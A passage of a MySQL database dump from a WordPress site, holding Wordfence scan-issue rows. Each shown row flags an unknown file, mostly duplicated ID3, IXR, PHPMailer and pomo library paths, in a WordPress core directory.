`time` int(10) unsigned NOT NULL,
`lastUpdated` int(10) unsigned NOT NULL,
`status` varchar(10) NOT NULL,
`type` varchar(20) NOT NULL,
`severity` tinyint(3) unsigned NOT NULL,
`ignoreP` char(32) NOT NULL,
`ignoreC` char(32) NOT NULL,
`shortMsg` varchar(255) NOT NULL,
`longMsg` text DEFAULT NULL,
`data` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `lastUpdated` (`lastUpdated`),
KEY `status` (`status`),
KEY `ignoreP` (`ignoreP`),
KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=34795 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfissues`
--
LOCK TABLES `wp_wfissues` WRITE;
/*!40000 ALTER TABLE `wp_wfissues` DISABLE KEYS */;
INSERT INTO `wp_wfissues` VALUES (33514,1631564662,1631564662,'new','knownfile',75,'bc0e1e98251a9ecbbbfd1638b3a60bff','44c9694bf8fafec3d3d15c94a2499d1e','Unknown file in WordPress core: wp-includes/pomo/pomo/entry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:31:\"wp-includes/pomo/pomo/entry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33515,1631564662,1631564662,'new','knownfile',75,'f0ca8859087c27712491046669d9090e','620c3ffdf68920e27a7834b774547252','Unknown file in WordPress core: wp-includes/pomo/pomo/mo.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:28:\"wp-includes/pomo/pomo/mo.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33516,1631564662,1631564662,'new','knownfile',75,'6c0d45deb56eb69f4100ab72b98d18a2','d11b3440081ddccd55bfdf2cc2a11901','Unknown file in WordPress core: wp-includes/pomo/pomo/plural-forms.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/pomo/pomo/plural-forms.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33517,1631564662,1631564662,'new','knownfile',75,'66fc81b51e18fb67e3ff8b11bd378ebe','a7b1d80a7b7c9a37dd357357f80720d4','Unknown file in WordPress core: wp-includes/pomo/pomo/po.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:28:\"wp-includes/pomo/pomo/po.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33518,1631564662,1631564662,'new','knownfile',75,'54b1379f429ead0b05c5679d25ddfe92','483fe8d0dc2f62591bc8c2efc2190bd8','Unknown file in WordPress core: wp-includes/pomo/pomo/streams.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/pomo/pomo/streams.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33519,1631564662,1631564662,'new','knownfile',75,'64bac185b3e6cab863ec6f49ca6a61e3','baaf322ae29febdddecae999f621ac77','Unknown file in WordPress core: wp-includes/pomo/pomo/translations.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/pomo/pomo/translations.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33520,1631564670,1631564670,'new','knownfile',75,'77d22a1325de146ef63725812f5eb9ab','1a208a3b35c521da2d4f8be452da6057','Unknown file in WordPress core: wp-includes/wp-includes/ID3/getid3.lib.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/ID3/getid3.lib.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33521,1631564670,1631564670,'new','knownfile',75,'fe9a874ec8009d3060815c1cc9a4e051','c3468696bde65f3b3f53531d99abc16a','Unknown file in WordPress core: wp-includes/wp-includes/ID3/getid3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/ID3/getid3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33522,1631564670,1631564670,'new','knownfile',75,'3ab761f7a379c75523754f6eb25f6495','16fa993cca3a52799a237e16186704e7','Unknown file in WordPress core: wp-includes/wp-includes/ID3/license.commercial.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/ID3/license.commercial.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33523,1631564670,1631564670,'new','knownfile',75,'74d25a7ace50a31cbe9a7ce75d76db58','cea9af9cea1278fb9854952524eb579c','Unknown file in WordPress core: wp-includes/wp-includes/ID3/license.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/ID3/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33524,1631564670,1631564670,'new','knownfile',75,'48969b6fdf21d8b27695f59778813485','59daecd942898180a8e3e12bb1779c9d','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio-video.asf.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/ID3/module.audio-video.asf.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33525,1631564670,1631564670,'new','knownfile',75,'66c981e25885d5d103fa104f22d7afc5','9bfc8c5b58f564e73497a76b35662c1d','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio-video.flv.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/ID3/module.audio-video.flv.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33526,1631564670,1631564670,'new','knownfile',75,'024351a8f935cfacf4f17d9777e3f93a','fe5705e877454cc9b4dcca8c8635ab75','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio-video.matroska.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/ID3/module.audio-video.matroska.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33527,1631564670,1631564670,'new','knownfile',75,'52c8abe6f45a44b2238bcac752ec83b4','f95bf679e45c454521cc91db7b7a21ed','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio-video.quicktime.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/ID3/module.audio-video.quicktime.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33528,1631564670,1631564670,'new','knownfile',75,'ac15bc028d933f823abe12e7a4817984','99f963f807257004eeb98f9617bd3990','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio-video.riff.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/ID3/module.audio-video.riff.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33529,1631564670,1631564670,'new','knownfile',75,'a6b5a645eaa93694707f6879f9849998','91e937f26f1159d453b1235c3bc8550d','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio.ac3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.audio.ac3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33530,1631564670,1631564670,'new','knownfile',75,'5d84704be6643a955009d85023719cbf','6b0d08c50060b7f69fda16a66be3bded','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio.dts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.audio.dts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33531,1631564670,1631564670,'new','knownfile',75,'ba7d56347a19a7dfff159b4411967b87','656daed317b78e7a7cceb2aeb0150656','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio.flac.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/ID3/module.audio.flac.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33532,1631564670,1631564670,'new','knownfile',75,'68857b06d1227d6f6905f5b89ab59e7f','eb836a884c788e72223bc7f9e00e1f8e','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio.mp3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.audio.mp3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33533,1631564670,1631564670,'new','knownfile',75,'876d72aa299395423b7836be0d678ce4','8ef6b35349ce0322b48c878b21b61a36','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio.ogg.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.audio.ogg.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33534,1631564670,1631564670,'new','knownfile',75,'6b1af94515c2f926d4bbe8c4c555017a','807270f5044d532db1fab53e99460860','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.tag.apetag.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/ID3/module.tag.apetag.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33535,1631564671,1631564671,'new','knownfile',75,'a0a6d50133a279f32c2e98c9797cef33','121e8ff076057ba98697fb18495f0498','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.tag.id3v1.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.tag.id3v1.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33536,1631564671,1631564671,'new','knownfile',75,'e363a399f9802e0b14b5702b4827c898','5207094f81b83536d1b8c46bc7b6f861','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.tag.id3v2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.tag.id3v2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33537,1631564671,1631564671,'new','knownfile',75,'13ccff56c48898aa2cbd5b982c6c996f','93dc106493662e01c51a5f09b1c719ff','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.tag.lyrics3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/ID3/module.tag.lyrics3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33538,1631564671,1631564671,'new','knownfile',75,'be49cd9777ff9e01e509d7a12ec937c2','727c25b2f6d62596de723b542ccadf36','Unknown file in WordPress core: wp-includes/wp-includes/ID3/readme.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/ID3/readme.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33539,1631564671,1631564671,'new','knownfile',75,'771404451be40d6a31589da2b9ead69b','203a5b57bd04872cbad6cded05975e47','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-base64.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/IXR/class-IXR-base64.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33540,1631564671,1631564671,'new','knownfile',75,'4494b5b8308418e963c3f19d00b4e99f','130e6f2e0682959461817eb5a8774487','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-client.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/IXR/class-IXR-client.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33541,1631564671,1631564671,'new','knownfile',75,'8aca3f840ae7ca81df838f11e9e27d60','d47947c5da7f046abf07cddbe206c9ee','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-clientmulticall.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/IXR/class-IXR-clientmulticall.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33542,1631564671,1631564671,'new','knownfile',75,'86f829f1770d485e04ee45c563772774','f7e06751f08be7e3cec87cfbb2df03fe','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-date.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/IXR/class-IXR-date.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33543,1631564671,1631564671,'new','knownfile',75,'e22a27bbdcb0ea9b01b59c9f9a81454d','56a701d90b3af5584c3586410b30ae18','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-error.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/IXR/class-IXR-error.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33544,1631564671,1631564671,'new','knownfile',75,'9a8cab8ec7937dd2dc3c05156c2c2d9c','6ba47616870d0ce6786a17d8af5d35ec','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-introspectionserver.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/IXR/class-IXR-introspectionserver.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33545,1631564671,1631564671,'new','knownfile',75,'83cb398448488191dfb27b8e473062dc','411d0ba771fe9366a84727396b886a5a','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-message.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/IXR/class-IXR-message.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33546,1631564671,1631564671,'new','knownfile',75,'f6c0938ac448895d15352009b544638e','04f02a5aa068c0b74514b0773b74a5fe','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-request.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/IXR/class-IXR-request.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33547,1631564671,1631564671,'new','knownfile',75,'baef6196c98571e8d95f8d8f015e0c76','cff0aa6743a3000714d9a4e39d67fea4','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-server.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/IXR/class-IXR-server.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33548,1631564671,1631564671,'new','knownfile',75,'7238129e2041be2ba8918216f7aef223','fc57a58db19bd17d1bc9b2283e38d563','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-value.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/IXR/class-IXR-value.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33549,1631564671,1631564671,'new','knownfile',75,'4464d270a010bf2d23d5cfcc974850fa','74291f40d1d082eaeba0def0f033d90a','Unknown file in WordPress core: wp-includes/wp-includes/PHPMailer/Exception.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/PHPMailer/Exception.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33550,1631564671,1631564671,'new','knownfile',75,'7bf4d6a23f9486223fa1c58cba952594','4361b1c56ee2f8a68b28bc8d6d5dd904','Unknown file in WordPress core: wp-includes/wp-includes/PHPMailer/PHPMailer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/PHPMailer/PHPMailer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33551,1631564671,1631564671,'new','knownfile',75,'20abcbfcd80ff447b2b349c2f2998dab','70d4331c9cbc584c2d758d4cc931190d','Unknown file in WordPress core: wp-includes/wp-includes/PHPMailer/SMTP.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/PHPMailer/SMTP.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33552,1631564671,1631564671,'new','knownfile',75,'71cfda2a6c8157d391e3af5392a3aba6','8d0b5129e3e26d6c767521287fe6567f','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Auth/Basic.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 